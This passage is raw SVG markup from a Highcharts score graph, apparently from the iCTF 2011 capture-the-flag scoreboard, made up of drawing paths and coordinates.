fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 257.672 231.172 L 263.328 231.172 263.328 236.828 257.672 236.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 256.172 232.172 L 261.828 232.172 261.828 237.828 256.172 237.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 254.672 232.172 L 260.328 232.172 260.328 237.828 254.672 237.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 253.172 232.172 L 258.828 232.172 258.828 237.828 253.172 237.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 251.672 232.172 L 257.328 232.172 257.328 237.828 251.672 237.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 250.172 232.172 L 255.828 232.172 255.828 237.828 250.172 237.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 248.672 232.172 L 254.328 232.172 254.328 237.828 248.672 237.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 247.172 232.172 L 252.828 232.172 252.828 237.828 247.172 237.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 245.672 232.172 L 251.328 232.172 251.328 237.828 245.672 237.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 244.172 232.172 L 249.828 232.172 249.828 237.828 244.172 237.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 242.672 232.672 L 248.328 232.672 248.328 238.328 242.672 238.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 241.172 232.672 L 246.828 232.672 246.828 238.328 241.172 238.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 239.672 232.672 L 245.328 232.672 245.328 238.328 239.672 238.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 238.172 232.672 L 243.828 232.672 243.828 238.328 238.172 238.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 236.172 232.672 L 241.828 232.672 241.828 238.328 236.172 238.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 234.672 232.672 L 240.328 232.672 240.328 238.328 234.672 238.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 233.172 232.672 L 238.828 232.672 238.828 238.328 233.172 238.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 231.672 233.672 L 237.328 233.672 237.328 239.328 231.672 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 230.172 233.672 L 235.828 233.672 235.828 239.328 230.172 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 228.672 233.672 L 234.328 233.672 234.328 239.328 228.672 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 227.172 233.672 L 232.828 233.672 232.828 239.328 227.172 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 225.672 233.672 L 231.328 233.672 231.328 239.328 225.672 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 224.172 233.672 L 229.828 233.672 229.828 239.328 224.172 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 222.672 233.672 L 228.328 233.672 228.328 239.328 222.672 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 221.172 233.672 L 226.828 233.672 226.828 239.328 221.172 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 219.672 233.672 L 225.328 233.672 225.328 239.328 219.672 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 218.172 233.672 L 223.828 233.672 223.828 239.328 218.172 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 216.672 233.672 L 222.328 233.672 222.328 239.328 216.672 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 215.172 233.672 L 220.828 233.672 220.828 239.328 215.172 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 213.672 233.672 L 219.328 233.672 219.328 239.328 213.672 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 212.172 233.672 L 217.828 233.672 217.828 239.328 212.172 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 210.672 233.672 L 216.328 233.672 216.328 239.328 210.672 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 208.672 233.672 L 214.328 233.672 214.328 239.328 208.672 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 207.172 233.672 L 212.828 233.672 212.828 239.328 207.172 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 205.672 233.672 L 211.328 233.672 211.328 239.328 205.672 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 204.172 233.672 L 209.828 233.672 209.828 239.328 204.172 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 202.672 233.672 L 208.328 233.672 208.328 239.328 202.672 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 201.172 233.672 L 206.828 233.672 206.828 239.328 201.172 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 199.672 233.672 L 205.328 233.672 205.328 239.328 199.672 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 198.172 233.672 L 203.828 233.672 203.828 239.328 198.172 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 196.672 233.672 L 202.328 233.672 202.328 239.328 196.672 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 195.172 233.672 L 200.828 233.672 200.828 239.328 195.172 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 193.672 233.672 L 199.328 233.672 199.328 239.328 193.672 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 192.172 233.672 L 197.828 233.672 197.828 239.328 192.172 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 190.672 233.672 L 196.328 233.672 196.328 239.328 190.672 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 189.172 233.672 L 194.828 233.672 194.828 239.328 189.172 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 187.672 233.672 L 193.328 233.672 193.328 239.328 187.672 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 186.172 233.672 L 191.828 233.672 191.828 239.328 186.172 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 184.672 233.672 L 190.328 233.672 190.328 239.328 184.672 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 182.672 233.672 L 188.328 233.672 188.328 239.328 182.672 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 181.172 233.672 L 186.828 233.672 186.828 239.328 181.172 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 179.672 233.672 L 185.328 233.672 185.328 239.328 179.672 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 178.172 233.672 L 183.828 233.672 183.828 239.328 178.172 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 176.672 233.672 L 182.328 233.672 182.328 239.328 176.672 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 175.172 233.672 L 180.828 233.672 180.828 239.328 175.172 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 173.672 233.672 L 179.328 233.672 179.328 239.328 173.672 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 172.172 233.672 L 177.828 233.672 177.828 239.328 172.172 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 170.672 233.672 L 176.328 233.672 176.328 239.328 170.672 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 169.172 233.672 L 174.828 233.672 174.828 239.328 169.172 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 167.672 233.672 L 173.328 233.672 173.328 239.328 167.672 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 166.172 233.672 L 171.828 233.672 171.828 239.328 166.172 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 164.672 233.672 L 170.328 233.672 170.328 239.328 164.672 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 163.172 233.672 L 168.828 233.672 168.828 239.328 163.172 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 161.672 233.672 L 167.328 233.672 167.328 239.328 161.672 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 160.172 233.672 L 165.828 233.672 165.828 239.328 160.172 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 158.672 233.672 L 164.328 233.672 164.328 239.328 158.672 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 157.172 233.672 L 162.828 233.672 162.828 239.328 157.172 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 155.172 233.672 L 160.828 233.672 160.828 239.328 155.172 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 153.672 233.672 L 159.328 233.672 159.328 239.328 153.672 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 152.172 233.672 L 157.828 233.672 157.828 239.328 152.172 239.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 150.672 234.172 L 156.328 234.172 156.328 239.828 150.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 149.172 234.172 L 154.828 234.172 154.828 239.828 149.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 147.672 234.172 L 153.328 234.172 153.328 239.828 147.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 146.172 234.172 L 151.828 234.172 151.828 239.828 146.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 144.672 234.172 L 150.328 234.172 150.328 239.828 144.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 143.172 234.172 L 148.828 234.172 148.828 239.828 143.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 141.672 234.172 L 147.328 234.172 147.328 239.828 141.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 140.172 234.172 L 145.828 234.172 145.828 239.828 140.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 138.672 234.172 L 144.328 234.172 144.328 239.828 138.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 137.172 234.172 L 142.828 234.172 142.828 239.828 137.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 135.672 234.172 L 141.328 234.172 141.328 239.828 135.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 134.172 234.172 L 139.828 234.172 139.828 239.828 134.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 132.672 234.172 L 138.328 234.172 138.328 239.828 132.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 131.172 234.172 L 136.828 234.172 136.828 239.828 131.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 129.672 234.172 L 135.328 234.172 135.328 239.828 129.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 127.672 234.172 L 133.328 234.172 133.328 239.828 127.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 126.172 234.172 L 131.828 234.172 131.828 239.828 126.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 124.672 234.172 L 130.328 234.172 130.328 239.828 124.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 123.172 234.172 L 128.828 234.172 128.828 239.828 123.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 121.672 234.172 L 127.328 234.172 127.328 239.828 121.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 120.172 234.172 L 125.828 234.172 125.828 239.828 120.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 118.672 234.172 L 124.328 234.172 124.328 239.828 118.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 117.172 234.172 L 122.828 234.172 122.828 239.828 117.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 115.672 234.172 L 121.328 234.172 121.328 239.828 115.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 114.172 234.172 L 119.828 234.172 119.828 239.828 114.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 112.672 234.172 L 118.328 234.172 118.328 239.828 112.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 111.172 234.172 L 116.828 234.172 116.828 239.828 111.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 109.672 234.172 L 115.328 234.172 115.328 239.828 109.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 108.172 234.172 L 113.828 234.172 113.828 239.828 108.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 106.672 234.172 L 112.328 234.172 112.328 239.828 106.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 105.172 234.172 L 110.828 234.172 110.828 239.828 105.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 103.672 234.172 L 109.328 234.172 109.328 239.828 103.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 102.172 234.172 L 107.828 234.172 107.828 239.828 102.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 100.172 234.172 L 105.828 234.172 105.828 239.828 100.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 98.672 234.172 L 104.328 234.172 104.328 239.828 98.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 97.172 234.172 L 102.828 234.172 102.828 239.828 97.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 95.672 234.172 L 101.328 234.172 101.328 239.828 95.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 94.172 234.172 L 99.828 234.172 99.828 239.828 94.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 92.672 234.172 L 98.328 234.172 98.328 239.828 92.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 91.172 234.172 L 96.828 234.172 96.828 239.828 91.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 89.672 234.172 L 95.328 234.172 95.328 239.828 89.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 88.172 234.172 L 93.828 234.172 93.828 239.828 88.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 86.672 234.172 L 92.328 234.172 92.328 239.828 86.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 85.172 234.172 L 90.828 234.172 90.828 239.828 85.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 83.672 234.172 L 89.328 234.172 89.328 239.828 83.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 82.172 234.172 L 87.828 234.172 87.828 239.828 82.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 80.672 234.172 L 86.328 234.172 86.328 239.828 80.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 79.172 234.172 L 84.828 234.172 84.828 239.828 79.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 77.672 234.172 L 83.328 234.172 83.328 239.828 77.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 76.172 234.172 L 81.828 234.172 81.828 239.828 76.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 74.672 234.172 L 80.328 234.172 80.328 239.828 74.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 72.672 234.172 L 78.328 234.172 78.328 239.828 72.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 71.172 234.172 L 76.828 234.172 76.828 239.828 71.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 69.672 234.172 L 75.328 234.172 75.328 239.828 69.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 68.172 234.172 L 73.828 234.172 73.828 239.828 68.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 66.672 234.172 L 72.328 234.172 72.328 239.828 66.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 65.172 234.172 L 70.828 234.172 70.828 239.828 65.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 63.672 234.172 L 69.328 234.172 69.328 239.828 63.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 62.172 234.172 L 67.828 234.172 67.828 239.828 62.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 60.672 234.172 L 66.328 234.172 66.328 239.828 60.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 59.172 234.172 L 64.828 234.172 64.828 239.828 59.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 57.672 234.172 L 63.328 234.172 63.328 239.828 57.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 56.172 234.172 L 61.828 234.172 61.828 239.828 56.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 54.672 234.172 L 60.328 234.172 60.328 239.828 54.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 53.172 234.172 L 58.828 234.172 58.828 239.828 53.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 51.672 234.172 L 57.328 234.172 57.328 239.828 51.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 50.172 234.172 L 55.828 234.172 55.828 239.828 50.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 48.672 234.172 L 54.328 234.172 54.328 239.828 48.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 47.172 234.172 L 52.828 234.172 52.828 239.828 47.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 45.172 234.172 L 50.828 234.172 50.828 239.828 45.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 43.672 234.172 L 49.328 234.172 49.328 239.828 43.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 42.172 234.172 L 47.828 234.172 47.828 239.828 42.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 40.672 234.172 L 46.328 234.172 46.328 239.828 40.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 39.172 234.172 L 44.828 234.172 44.828 239.828 39.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 37.672 234.172 L 43.328 234.172 43.328 239.828 37.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 36.172 234.172 L 41.828 234.172 41.828 239.828 36.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 34.672 234.172 L 40.328 234.172 40.328 239.828 34.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 33.172 234.172 L 38.828 234.172 38.828 239.828 33.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 31.672 234.172 L 37.328 234.172 37.328 239.828 31.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 30.172 234.172 L 35.828 234.172 35.828 239.828 30.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 28.672 234.172 L 34.328 234.172 34.328 239.828 28.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 27.172 234.172 L 32.828 234.172 32.828 239.828 27.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 25.672 234.172 L 31.328 234.172 31.328 239.828 25.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 24.172 234.172 L 29.828 234.172 29.828 239.828 24.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 22.672 234.172 L 28.328 234.172 28.328 239.828 22.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 21.172 234.172 L 26.828 234.172 26.828 239.828 21.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 19.172 234.172 L 24.828 234.172 24.828 239.828 19.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 17.672 234.172 L 23.328 234.172 23.328 239.828 17.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 16.172 234.172 L 21.828 234.172 21.828 239.828 16.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 14.672 234.172 L 20.328 234.172 20.328 239.828 14.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 13.172 234.172 L 18.828 234.172 18.828 239.828 13.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 11.672 234.172 L 17.328 234.172 17.328 239.828 11.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 10.172 234.172 L 15.828 234.172 15.828 239.828 10.172 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 8.672 234.172 L 14.328 234.172 14.328 239.828 8.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 7.172000000000001 234.172 L 12.828 234.172 12.828 239.828 7.172000000000001 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 5.672000000000001 234.172 L 11.328 234.172 11.328 239.828 5.672000000000001 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 4.172000000000001 234.172 L 9.828 234.172 9.828 239.828 4.172000000000001 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 2.672 234.172 L 8.328 234.172 8.328 239.828 2.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 1.1720000000000002 234.172 L 6.827999999999999 234.172 6.827999999999999 239.828 1.1720000000000002 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path></g><g class="highcharts-series" clip-path="url(http://scoreboard.ictf2011.info/score-graph.html#highcharts-1580)" visibility="visible" transform="translate(75,55)"><path d="M 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.8 L 58.92095588235295 236.8 L 60.44898897058824 236.8 L 61.977022058823536 236.8 L 63.505055147058826 236.8 L 65.03308823529412 236.8 L 66.56112132352942 236.8 L 68.08915441176471 236.8 L 69.6171875 236.8 L 71.1452205882353 236.8 L 72.6732536764706 236.8 L 74.20128676470588 236.8 L 75.72931985294119 236.8 L 77.25735294117648 236.8 L 78.78538602941177 236.8 L 80.31341911764706 236.8 L 81.84145220588236 236.8 L 83.36948529411765 236.8 L 84.89751838235294 236.8 L 86.42555147058825 236.8 L 87.95358455882354 236.8 L 89.48161764705883 236.8 L 91.00965073529413 236.8 L 92.53768382352942 236.8 L 94.06571691176471 236.8 L 95.59375 236.8 L 97.1217830882353 236.8 L 98.6498161764706 236.8 L 100.17784926470588 236.8 L 101.70588235294119 236.8 L 103.23391544117648 236.8 L 104.76194852941177 236.8 L 106.28998161764706 236.8 L 107.81801470588236 236.8 L 109.34604779411765 236.8 L 110.87408088235294 236.8 L 112.40211397058825 236.8 L 113.93014705882354 236.8 L 115.45818014705883 236.8 L 116.98621323529413 236.8 L 118.51424632352942 236.8 L 120.04227941176471 236.8 L 121.5703125 236.8 L 123.0983455882353 236.8 L 124.6263786764706 236.8 L 126.15441176470588 236.8 L 127.68244485294119 236.8 L 129.21047794117646 236.8 L 130.73851102941177 236.8 L 132.26654411764707 236.8 L 133.79457720588235 236.8 L 135.32261029411765 236.8 L 136.85064338235296 236.8 L 138.37867647058823 236.8 L 139.90670955882354 236.8 L 141.43474264705884 236.8 L 142.96277573529412 236.8 L 144.49080882352942 236.8 L 146.01884191176472 236.8 L 147.546875 236.8 L 149.0749080882353 236.8 L 150.6029411764706 236.8 L 152.13097426470588 236.8 L 153.6590073529412 236.8 L 155.18704044117646 236.8 L 156.71507352941177 236.8 L 158.24310661764707 236.8 L 159.77113970588235 236.8 L 161.29917279411765 236.8 L 162.82720588235296 236.8 L 164.35523897058823 236.8 L 165.88327205882354 236.8 L 167.41130514705884 236.8 L 168.93933823529412 236.8 L 170.46737132352942 236.8 L 171.99540441176472 236.8 L 173.5234375 236.8 L 175.0514705882353 236.8 L 176.5795036764706 236.8 L 178.10753676470588 231.05474656 L 179.6355698529412 231.05474656 L 181.1636029411765 231.05474656 L 182.69163602941177 231.05474656 L 184.21966911764707 231.05474656 L 185.74770220588235 231.05474656 L 187.27573529411765 231.05474656 L 188.80376838235296 231.05474656 L 190.33180147058823 231.05474656 L 191.85983455882354 231.05474656 L 193.38786764705884 231.05474656 L 194.91590073529412 226.19561055999998 L 196.44393382352942 224.31216256 L 197.97196691176472 222.151541344 L 199.5 219.24145878399997 L 201.0280330882353 216.05062614399998 L 202.5560661764706 212.47699841066662 L 204.08409926470588 212.47699841066662 L 205.6121323529412 212.47699841066662 L 207.1401654411765 212.47699841066662 L 208.66819852941177 212.47699841066662 L 210.19623161764707 212.47699841066662 L 211.72426470588235 212.47699841066662 L 213.25229779411765 212.47699841066662 L 214.78033088235296 212.47699841066662 L 216.30836397058823 212.47699841066662 L 217.83639705882354 212.04237569066663 L 219.36443014705884 212.04237569066663 L 220.89246323529412 212.04237569066663 L 222.42049632352942 212.04237569066663 L 223.94852941176472 212.04237569066663 L 225.4765625 212.04237569066663 L 227.0045955882353 212.04237569066663 L 228.5326286764706 212.04237569066663 L 230.06066176470588 211.90512641066664 L 231.5886948529412 210.86108705066664 L 233.1167279411765 210.86108705066664 L 234.64476102941177 210.86108705066664 L 236.17279411764707 210.86108705066664 L 237.70082720588238 210.86108705066664 L 239.22886029411765 210.86108705066664 L 240.75689338235296 210.86108705066664 L 242.28492647058823 210.86108705066664 L 243.81295955882354 210.86108705066664 L 245.34099264705884 210.86108705066664 L 246.86902573529412 210.86108705066664 L 248.39705882352942 210.86108705066664 L 249.92509191176472 210.86108705066664 L 251.453125 210.86108705066664 L 252.9811580882353 210.86108705066664 L 254.5091911764706 210.86108705066664 L 256.0372242647059 210.86108705066664 L 257.56525735294116 210.86108705066664 L 259.09329044117646 210.86108705066664 